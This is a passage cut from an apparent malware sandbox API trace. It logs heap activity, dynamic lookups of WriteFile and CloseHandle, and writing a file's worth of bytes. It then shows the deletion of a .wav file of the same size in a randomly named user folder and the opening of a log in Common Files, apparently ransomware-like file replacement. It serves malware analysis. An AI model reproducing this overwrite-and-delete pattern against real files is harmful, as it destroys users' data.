(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0182.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.561] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0182.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd7c8 [0182.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd7c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0182.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.562] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0182.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0182.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0182.563] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x122b9, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x122b9, lpOverlapped=0x0) returned 1 [0182.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0182.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0182.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0182.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0182.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0182.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0182.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0182.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0182.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0182.567] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0182.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0182.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.569] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0182.570] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0182.570] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.570] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.570] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0182.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0182.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0182.573] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.573] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.573] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.574] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", lpFilePart=0x0) returned 0x63 [0182.576] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x12101260, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 0x90ae18 [0182.577] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\tebq0vdnsx.wav")) returned 1 [0182.580] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223d2d0, ftCreationTime.dwHighDateTime=0x1d5da62, ftLastAccessTime.dwLowDateTime=0x2574c2b0, ftLastAccessTime.dwHighDateTime=0x1d5e60d, ftLastWriteTime.dwLowDateTime=0x12101260, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x122b9, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="teBq0VdNSx.wav", cAlternateFileName="TEBQ0V~1.WAV")) returned 0 [0182.580] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0182.580] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.581] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.581] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0182.581] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.581] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.581] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.581] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.581] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0182.581] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.582] SetFilePointerEx (in: 